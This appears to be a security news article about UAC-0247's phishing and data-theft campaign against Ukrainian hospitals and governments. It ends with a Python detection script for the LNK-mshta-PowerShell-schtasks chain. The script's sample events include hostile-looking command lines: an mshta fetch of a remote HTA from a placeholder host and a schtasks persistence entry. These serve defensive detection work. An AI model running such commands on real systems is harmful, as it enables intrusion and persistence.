Phantom Aid: How UAC-0247 Hijacks Hospitals and Governments in a Covert Data Heist
A sophisticated cybercrime group leverages fake humanitarian fronts and advanced malware to plunder browser and WhatsApp data from Ukraine’s critical institutions.
It began with an email - a plea for humanitarian partnership, seemingly from a reputable nonprofit. But behind the promise of aid lurked a digital predator: UAC-0247, a threat actor engineering one of the most audacious cyber-espionage campaigns to hit Ukrainian hospitals and government agencies in recent memory. As municipal networks scrambled to respond, evidence mounted: this was no ordinary phishing attempt, but a calculated assault, blending social engineering, AI-generated deception, and stealthy malware to siphon sensitive data from the heart of Ukraine’s public sector.
Fast Facts
- UAC-0247 targets hospitals and local governments with tailored phishing lures referencing humanitarian aid.
- Attackers deploy custom malware to steal browser credentials and WhatsApp data, using tools like CHROMELEVATOR and ZAPIXDESK.
- Malicious payloads are delivered via shortcut (.LNK) files, HTA scripts, and scheduled tasks, evading routine detection.
- Campaign includes advanced persistence, encrypted reverse shells, and lateral movement using public tools and covert tunnels.
- CERT-UA warns of ongoing attacks and recommends restricting script execution and monitoring for suspicious activity.
A Humanitarian Ruse with Technical Precision
The attack chain begins in inboxes: messages crafted to appear as urgent humanitarian proposals, often accompanied by links to convincing AI-generated nonprofit websites or legitimate sites compromised through cross-site scripting (XSS). With a single click, victims unwittingly download an archive containing a shortcut file (LNK). The moment this file is opened, it triggers a sequence that leverages Windows utilities like mshta.exe to execute hidden scripts.
These scripts download further payloads, quietly establishing a foothold on the target system. A decoy form may flash on screen, but in the background, a custom two-stage loader unpacks a heavily encrypted reverse shell known as RAVENSHELL. Communication with the attackers is encrypted and covert, allowing for remote command execution, file theft, and system control.
The final stage deploys AGINGFLY - a remote administration tool with dynamic command modules, capable of keylogging, screenshot capture, and arbitrary code execution. Attackers maintain persistence via PowerShell scripts like SILENTLOOP, which cleverly use Telegram channels for backup command-and-control if primary infrastructure is blocked.
Browser and WhatsApp Data in the Crosshairs
UAC-0247’s endgame is data theft. Their toolkit includes CHROMELEVATOR, which extracts passwords and cookies from Chromium-based browsers, and ZAPIXDESK, specialized in decrypting desktop WhatsApp databases. These tools enable the theft of sensitive credentials and private communications - potentially devastating for hospitals handling patient data or government agencies managing critical infrastructure.
The attackers don’t stop there. Reconnaissance unfolds with subnet scanners like RUSTSCAN, while stealthy network tunnels are built using LIGOLO-NG and CHISEL. In some cases, the group even deployed cryptocurrency miners disguised within legitimate VPN applications, turning compromised hosts into covert profit engines.
Defending Against a Persistent Threat
CERT-UA’s investigation underscores the urgency of robust cyber hygiene: restrict execution of risky file types (LNK, HTA, JS), limit the use of scripting utilities, and monitor for suspicious network connections and abnormal process activity. In the face of UAC-0247’s evolving tactics, proactive defense and continuous monitoring are the best shields against a campaign that shows no sign of stopping.
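One way to turn the process-level monitoring recommended here into concrete detection logic, as an added example that is not part of CERT-UA's advisory or this article: it encodes the LNK -> mshta.exe -> PowerShell -> scheduled-task chain described above as four rules and runs them over constructed process-creation events. Field names are modelled on Sysmon Event ID 1 and the events, the `.invalid` domain and the command lines are made up for illustration.

```python
import re

# Constructed sample process-creation events (fields modelled on Sysmon Event ID 1); illustrative only.
SAMPLE_EVENTS = [
    {"pid": 4101, "image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'mshta.exe "http://aid-form.invalid/proposal.hta"'},
    {"pid": 4102, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": "powershell.exe -w hidden -c <stage-2 downloader placeholder>"},
    {"pid": 4103, "image": r"C:\Windows\System32\schtasks.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'schtasks.exe /create /sc minute /mo 5 /tn Updater /tr "powershell.exe -File loop.ps1"'},
    # A local HTA launched by a service process: not matched by any rule below.
    {"pid": 4104, "image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\setup.hta"},
    {"pid": 4105, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "firefox.exe"},
]

SCRIPT_HOSTS = ("mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe")
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def basename(path):
    # Last path component, lower-cased, so rules compare image names only.
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the names of the rules an event triggers (empty list = no finding)."""
    img, parent = basename(event["image"]), basename(event["parent"])
    cmd = event["cmdline"].lower()
    hits = []
    # Rule 1: a script host started by the shell, i.e. the user opened a file such as an LNK.
    if img in SCRIPT_HOSTS and parent == "explorer.exe":
        hits.append("script-host-from-explorer")
    # Rule 2: mshta.exe fetching its HTA over HTTP(S) instead of running one from disk.
    if img == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta-remote-hta")
    # Rule 3: PowerShell spawned by another script host (the next stage of the chain).
    if img == "powershell.exe" and parent in SCRIPT_HOSTS:
        hits.append("powershell-child-of-script-host")
    # Rule 4: scheduled-task creation whose action is itself a script host (persistence).
    if img == "schtasks.exe" and "/create" in cmd and any(h in cmd for h in SCRIPT_HOSTS):
        hits.append("schtasks-runs-script-host")
    return hits

def scan(events):
    """Map pid -> triggered rules, keeping only events with at least one finding."""
    return {e["pid"]: classify(e) for e in events if classify(e)}
```

Rule 1 will also fire on legitimate user-launched scripts, so in production it is best treated as a correlation input (combine with Rule 2 or 3 from the same process tree) rather than an alert on its own.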
As cybercriminals like UAC-0247 weaponize humanitarian crises for digital plunder, Ukraine’s institutions face a sobering reality: even the promise of aid can be a wolf in sheep’s clothing.
WIKICROOK
- Phishing: Phishing is a cybercrime where attackers send fake messages to trick users into revealing sensitive data or clicking malicious links.
- Reverse Shell: A reverse shell is when a compromised computer secretly connects back to an attacker, giving them remote control and bypassing standard security defenses.
- Lateral Movement: Lateral movement is when attackers, after breaching a network, move sideways to access more systems or sensitive data, expanding their control and reach.
- Cross-Site Scripting: Cross-Site Scripting (XSS) is a cyberattack where hackers inject malicious code into websites to steal user data or hijack sessions.
- DLL Side-Loading: DLL side-loading is a technique where attackers trick programs into loading malicious DLL files, bypassing security and gaining unauthorized access or control.